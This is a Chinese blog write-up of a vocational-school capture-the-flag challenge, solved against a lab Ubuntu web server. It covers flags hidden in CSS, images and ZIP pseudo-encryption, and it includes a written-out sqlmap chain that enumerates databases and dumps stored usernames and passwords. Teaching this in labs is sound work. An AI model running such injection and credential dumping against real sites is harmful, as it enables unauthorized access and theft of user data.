中职网络安全隐藏信息探索思路以及讲解

1.通过本地PC中渗透测试平台Kali对服务器场景Ubuntu中的网站进行访问,找到登录界面中的FLAG,并将FLAG提交;

 

 打开网页进来是一个登录界面,但是上面并没有什么,直接CTRL+U或者F12查看代码。

这上面也是什么也没有,但是class.css可以看它的css代码,点进去看看

 发现下面有一个flag:welcome to css!

2.通过本地PC中渗透测试平台Kali对服务器场景Ubuntu中的网站进行访问,找到登录界面背景中的FLAG,并将FLAG提交;

 看题目这个背景应该指的是登录揭秘那的背景图,我们打开F12看看。

 找到了名为bgf.jpg的那种登录界面的图,flag应该就隐写在这张图片里面,我们下载下来用记事本打开看看。

 我们在文件尾部发现类似flag的字符串,因为记事本解码问题,显示错误,我们抓个包看看。

那么flag:Picturemerge

3.通过本地PC中渗透测试平台Kali对服务器场景Ubuntu中的网站进行访问,在登录界面中录,登录成功后在成功的界面中找到FLAG并提交;

 题目说要进行登录,但是我们在页面输入不了,F12也找不到input输入,那么只可以抓包试试了

 找到输入接口了,先试试admin/123456,发现弹回了连接失败的页面,在使用burp暴力破解,发现也破不开,那么在试试sql注入,注入一个单引号,返回了“no result!”说明是通过数据库链接前端的,然后试试sqlmap一把嗦。

sqlmap -u http://172.16.107.129/loginauth.php?username=1

发现可以注入,然后我们继续。

sqlmap -u http://172.16.107.129/loginauth.php?username=1 -dbs

 其他三个都是mysql自带的,我们直接看hello这个库。(这是sql盲注,嗦的时间会慢一点)

sqlmap -u http://172.16.107.129/loginauth.php?username=1 -D hello --tables 


 

sqlmap -u http://172.16.107.129/loginauth.php?username=1 -D hello -T user -columns

sqlmap -u http://172.16.107.129/loginauth.php?username=1 -D hello -T user -C username,password --dump 

 

 ok,用户密码也是成功的破解了,因为直接输入输不进去,所以用burp,get请求一下

 这里弹了一个302报错了,但是出现了url重定向跳转,点一下就可以了

 

 flag:4C6F67696E207375636365737366756C

4.通过本地PC中渗透测试平台Kali对服务器场景Ubuntu中的网站进行访问,登录成功后找到页面中的月亮,将月亮中的信息解密,并将解密后的信息作为FLAG提交;

 我们在浏览器里面get请求一下, 然后跳转到了这个页面

 然后跳转到了这个页面

我们来点两下月亮,弹出来:

 上面题目说解密,我第一就想到了base64解密,

 解密出来就是Base64decryptedsuccessfully 

5.通过本地PC中渗透测试平台Kali对服务器场景Ubuntu中的网站进行访问,登录成功后找到页面中的十字星,将十字星中页面内容进行下载,将下载到的文件解密,并将解密后的文件内容作为FLAG提交;

 题目上说十字星,那我们全点一遍,在地球的右下方点出来一个test.zip应该就是这个东西了。这个文件有密码加密的,里面有个flag.png。乱试了一下密码,没有对的,按照这个尿性也不用暴力破解了,直接看二进制有没有伪加密。

 然后发现数据区和目录区的全局方式位标记(就是我小框标记出来的)第二位一个为偶数,一个为奇数,我来简单的解释一下,如果两个都为偶数那么这个文件就没有被加密,如果两个都为奇数则有加密且有密码,但是现在这两个数不一样,那么这个文件就是伪加密的。(关于伪加密可以去zip伪加密_SIAT_啊哦的博客-CSDN博客_压缩文件伪加密看看,这里写的很详细),现在只需要把第二个数改为偶数就可以破解伪加密。

破解之后打开这个png发现是损坏的,照我的尿性肯定是先用记事本打开看看

那么flag也就浮出水面了 

6.通过本地PC中渗透测试平台Kali对服务器场景Ubuntu中的网站进行访问,在登录界面中登录,登录失败后找到页面中的链接访问连接并下载文件,将文件中的隐藏文件全称作为FLAG提交;

看题目现在是要找登陆失败的页面了,因为登录失败页面是直接一闪而过的,所以直接burp抓包(手速快的话,也可以在点login的一瞬间按CTRL+U(滑稽))

找到了一个链接,用浏览器打开看看 ,点开就是一个bg.jpg,那么这一题的flag就是这个文件的名字

bg.jpg

7.通过本地PC中渗透测试平台Kali对服务器场景Ubuntu中的网站进行访问,在登录界面中登录,登录失败后找到页面中的链接访问连接并下载文件,将文件中隐藏信息文件的内容作为FLAG提交;

 这种找片不用多说,直接记事本打开看看,但是什么都没有。这就得抬出图片隐写工具steghide了

看看可不可以分离出什么东西,发现又要密码(看到这里差点直接昏过去)点了下回车发现直接分离出来了a.txt

打开是乱码,但开头是png

 直接改后缀

 所以flag:It is over look back

8.通过本地PC中渗透测试平台Kali对服务器场景Ubuntu中的网站进行访问,寻找每页中的隐藏信息,将每条信息按顺序合并,作为FLAG提交;

 这一题就让大家自己去找吧,html是藏在每个页面或者页面代码里的

类外我发的这些图片里就藏着第一个(滑稽)

Strelizia_XX
关注 关注
  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
2021年全国职业技能大赛“网络安全赛项”国赛 模块B 任务解析(超详细)
Aluxian_的博客
12-17 5226
2021年全国职业技能大赛“网络安全赛项”国赛 模块B 任务解析B-5 任务五:隐写术应用1.找出文件夹1中的文件,将文件中的隐藏信息作为Flag值提交;2.找出文件夹2中的文件,将文件中的隐藏信息作为Flag值提交;3.找出文件夹3中的文件,将文件中的隐藏信息作为Flag值提交;4.找出文件夹4中的文件,将文件中的隐藏信息作为Flag值提交;5.找出文件夹5中的文件,将文件中的隐藏信息作为Flag值提交。B-6 任务六:Web安全应用1.获取PHP的版本号作为flag值提交;(例如:5.2.14)2.获取
信息隐藏探索 中职网络安全
zx66661的博客
09-06 825
某年国赛
2022年中职网络安全“—隐藏信息探索(misc)
weixin_57060854的博客
10-16 4099
这道题目主要考的是CTF中的杂项(misc)中的图片信息隐写,和对于一些工具的使用。
网络安全竞赛—隐藏信息探索解析教程
旺仔Sec&blog
04-27 596
中的网站进行访问,登录成功后找到页面中的十字星,将十字星中页面内容进行下载,将下载到的文件解密,并将解密后的文件内容作为FLAG提交。中的网站进行访问,在登录界面中登录,登录失败后找到页面中的链接访问连接并下载文件,将文件中隐藏信息文件的内容作为FLAG提交。中的网站进行访问,在登录界面中登录,登录失败后找到页面中的链接访问连接并下载文件,将文件中的隐藏文件全称作为FLAG提交。中的网站进行访问,登录成功后找到页面中的月亮,将月亮中的信息解密,并将。通过本地PC中渗透测试平台Kali对服务器场景。
2022年中职网络安全“—隐写术应用(misc)
weixin_57060854的博客
03-19 878
2022年中职"网络安全"-隐写术应用(misc)
中职网络安全2022国赛之隐写术应用
Ba1_Ma0的博客
04-26 3816
简介 有什么不会的可以来问我:3316735898,需要题目,解题工具和脚本的也可以来找我 1.找出文件夹1中的文件,将文件中的隐藏信息作为Flag值提交 打开文件 将文件放入kali,查询文件内部是否有其他文件 binwalk final.png 发现有一个地址开头为0x1D55DC的图片,我们可以手动将它分离,也可以使用工具将他分离,这里我们使用手工,打开HXD HEX ctrl+e 设置起始地址为1D55DC 然后ctrl+c复制1D55DC之后的十六进制值,新建一个文件,ctrl+v粘贴,
中职网络安全竞赛-隐藏信息探索-web2-自己建立的题目环境
06-02
隐藏信息探索-web2 1、通过URL访问http://靶机IP/1,对该页面进行渗透测试,将完成后返回的结果内容作为 FLAG值提交; 访问页面是一个加法计算题目:****但是输入框里面只能输入一个数字,打开开发者模式修改...
中职网络安全隐写术应用
12-19
网络安全领域,隐写术常用于信息隐藏、数据加密以及取证分析等方面。 在CTF(Capture The Flag,网络安全竞赛)中,隐写术也是常见的挑战项目之一,参赛者需要通过查找并提取隐藏信息来完成任务。这涉及到对不同...
中职网络安全 系统漏洞 隐藏信息探索 解析
Jay
06-05 913
任务环境说明:Flag: showmount –e 0.0.0.0Flag: /Flag: mount –t nfs 0.0.0.0:/ /mntFlag: 4.9GFlag: find /mnt –name flag.txtFlag: fLaG{0001030}任务环境说明:进F12看,找到Sources选项,在里面找到class.css,往下翻就能找到flag Flag:WELCOME TO CSS!使用burpsuite对登录界面进抓包,然后找到图片再复制图片地址,在burpsuite上接上图片的地址
中科磐云-中职网络空间安全实训题及讲解(超详细+flag)
12-19
网络空间安全实训】是针对中职学生的网络安全教育项目,旨在提升学生的网络安全技术和实战能力,培养他们在网络、操作系统、应用及服务器等领域的信息保护和渗透测试技能。通过竞赛形式,学生能够学习到如何进行...
网页考试题目与答案
12-28
网页考试题目与答案,里面有详细的说明
点击问题展开隐藏答案JS代码
05-27
点击问题展开隐藏答案JS代码,对于内容太多的问答式的网页,正好可以使网页更精简,方便网友浏览,可以对CSS进行编辑,控制标题和展开栏所在栏的宽度和文字大小
2023年中职网络安全竞赛解析——隐藏信息探索
旺仔Sec&blog
03-05 1990
2023年中职网络安全竞赛解析——隐藏信息探索
打开网页源代码的方法
最新发布
m0_73514785的博客
01-21 5706
在浏览器的设置菜单栏中,找到“更多工具”,然后再找“开发者工具”可以进入。点击键盘上的F12键,可以直接进入;使用快捷键Ctrl+U可以进入;点击鼠标右键,点击查看源代码;
怎么查看html隐藏代码,隐藏HTML源代码 怎样查看网页隐藏的html源码
weixin_39827798的博客
06-03 9595
HTML中怎样隐藏JS代码.net中的逻辑代码都写在了后台程序中,而html的逻辑代码只有靠js代码来无法隐藏,只能混淆或者加密。 严格不能叫加密只是混淆替换了所有的变量名。脚本语言混淆只是可读性变差了。但是高手会用chrome或者ff的console去调试你的JS所以,安全是相对来说的。如何使用python或R抓取网页隐藏的源代码隐藏的源代码?不知道你指的是什么?我的理解有两种,一是不在前段显...
用浏览器F12功能便可以查询网页的代码详情。
eca33的博客
05-17 6893
辅助参考:https://blog.csdn.net/m0_37724356/article/details/79884006 chrome浏览器中 F12 功能的简单介绍
QAX答题页面js逆向分析(二)
qq_44894994的博客
09-08 3610
继上一篇博客,主要讲解了页面分析的思路,没有什么可以实操的代码,因此在此继续开启一篇代码实现的文章,具体实现思路,参考上一篇博客:QAX答题页面js逆向分析(一)即可提示:以下是本篇文章正文内容,下面案例可供参考这次测试,基本能够达到了最初的答题满分的目的,也在一定程度上对自身掌握技术的重新认识,有了更好的前进方向。对于常见数据加密方式认识不足,需要恶补抓包工具使用不熟练,只局限普通的http请求,没能最大化发挥工具的作用。
CTF-WEB做题解析
qq_63676207的博客
02-09 1264
1 view_source 这个首先下载环境打开后是这个页面 ctrl+f查看源代码发现flag cyberpeace{f6ae307bc76ed9d260c19e9936765c00 2 robots 这个下好环境后点进去显示啥都没有 看看题目是robots想到是Robots协议(也称为爬虫协议、机器人协议等)的全称是“网络爬虫排除标准”(Robots Exclusion Protocol),网站通过Robots协议告诉搜索引擎哪些页面可以抓取,哪些页面不能抓取。 Robots协议也..
f12开发者工具详解_wp详解大礼包(一)
weixin_33210666的博客
01-13 729
开拓杯wp详解随着当初的决赛渐渐落入尾声咱们比赛的wp也逐渐浮出水面应各位想要(看答案)学习的要求今天咱们就公布开拓杯初赛的wp签到题1.f12打开开发者工具。根据提示的gccisc的flag前缀,我们可以在源代码上面的查找框查找元素,快速定位flag找到网页中的flag提交即可。开发者工具2.复制粘贴发现字数超过了限制,打开f12发现input标签钟maxlength中限制了最大元素...
厦门工商旅游学校网络信息安全专业人才培养方案详解
此外,信息安全防护、数据库安全与管理、数据备份与恢复等专业技能是必不可少的,还需要理解和应用网络协议分析以及网络安全技术。在硬件层面,学生要能够安装和配置网络安全设备。 更重要的是,该专业注重培养学生...
写文章

热门文章

  • kali工具SQLmap基本使用方法流程以及命令解析 5963
  • 中职网络安全2021年国赛Wireshark流量分析题目解析 4603
  • 中职网络安全隐藏信息探索思路以及讲解 2541
  • 中职网络安全2022年江西省B-1:Windows操作系统渗透测试 1609
  • 中职网络安全B模块Windows 操作系统渗透测试2023年湖南省 1551

分类专栏

  • 中职网络安全 付费 1篇

最新评论

  • 2023年湖南省网络安全B-3Linux系统渗透提权

    Strelizia_XX: pass要自己创建

  • 中职网络安全2021年国赛Wireshark流量分析题目解析

    苏生要努力: 求数据包文件谢谢,求

  • 2023年湖南省网络安全B-3Linux系统渗透提权

    秋528: pass在哪个文件夹

  • 中职网络安全2021年国赛Wireshark流量分析题目解析

    c868954104: 有无那个capture.pcapng数据包文件文件啊,可以发一份吗

  • 中职网络安全2022湖南省B-2任务二:数据包分析

    m0_64360528: 哥哥好棒呀

大家在看

  • CSS的弹性盒子模型(Flex box)
  • 瑞芯微mpph264enc输出FHD的尺寸故障追踪 898
  • SkyWalking 接入微服务
  • 回归预测|基于鹈鹕优化径向基神经网络的数据回归预测Matlab程序POA-RBF 多特征输入单输出 含基础RBF 865
  • 为什么要关闭SMB V1

最新文章

  • 2023陇剑杯线上赛Server save
  • 2023湖南省中职网络安全任务书
  • 2023中职网络安全B模块中间件渗透测试
2023年6篇
2022年16篇

目录

目录

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43元 前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Strelizia_XX

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或 充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值

天下网标王网站关键字怎么优化济南网站优化 鹊起科技网站建设优化推广哪家性价比高盐城网站优化渠道网站推广优化软件在线咨询无锡网站排名优化网站建设之锚文本优化长沙网站优化seo秦皇岛网站优化代理价格海山手机网站优化网站优化实训建议运城网站关键词优化建信优化配置基金网站菏泽实力强的电商网站优化竞价网站优化什么叫做seo网站优化东城网站优化排名公司长沙整站优化网站专业网站seo优化联系方式网站优化工程师累吗邯郸家装行业网站优化推广渠道舟山网站的优化报价沧州网站推广优化商集客电话太原网站优化seo高淳区网站优化推广网站seo优化有什么好处数字化网站优化方案网站出租优化湖南网站优化设计潜山网站优化哪家价格便宜香港通过《维护国家安全条例》两大学生合买彩票中奖一人不认账让美丽中国“从细节出发”19岁小伙救下5人后溺亡 多方发声卫健委通报少年有偿捐血浆16次猝死汪小菲曝离婚始末何赛飞追着代拍打雅江山火三名扑火人员牺牲系谣言男子被猫抓伤后确诊“猫抓病”周杰伦一审败诉网易中国拥有亿元资产的家庭达13.3万户315晚会后胖东来又人满为患了高校汽车撞人致3死16伤 司机系学生张家界的山上“长”满了韩国人?张立群任西安交通大学校长手机成瘾是影响睡眠质量重要因素网友洛杉矶偶遇贾玲“重生之我在北大当嫡校长”单亲妈妈陷入热恋 14岁儿子报警倪萍分享减重40斤方法杨倩无缘巴黎奥运考生莫言也上北大硕士复试名单了许家印被限制高消费奥巴马现身唐宁街 黑色着装引猜测专访95后高颜值猪保姆男孩8年未见母亲被告知被遗忘七年后宇文玥被薅头发捞上岸郑州一火锅店爆改成麻辣烫店西双版纳热带植物园回应蜉蝣大爆发沉迷短剧的人就像掉进了杀猪盘当地回应沈阳致3死车祸车主疑毒驾开除党籍5年后 原水城县长再被查凯特王妃现身!外出购物视频曝光初中生遭15人围殴自卫刺伤3人判无罪事业单位女子向同事水杯投不明物质男子被流浪猫绊倒 投喂者赔24万外国人感慨凌晨的中国很安全路边卖淀粉肠阿姨主动出示声明书胖东来员工每周单休无小长假王树国卸任西安交大校长 师生送别小米汽车超级工厂正式揭幕黑马情侣提车了妈妈回应孩子在校撞护栏坠楼校方回应护栏损坏小学生课间坠楼房客欠租失踪 房东直发愁专家建议不必谈骨泥色变老人退休金被冒领16年 金额超20万西藏招商引资投资者子女可当地高考特朗普无法缴纳4.54亿美元罚金浙江一高校内汽车冲撞行人 多人受伤

天下网标王 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化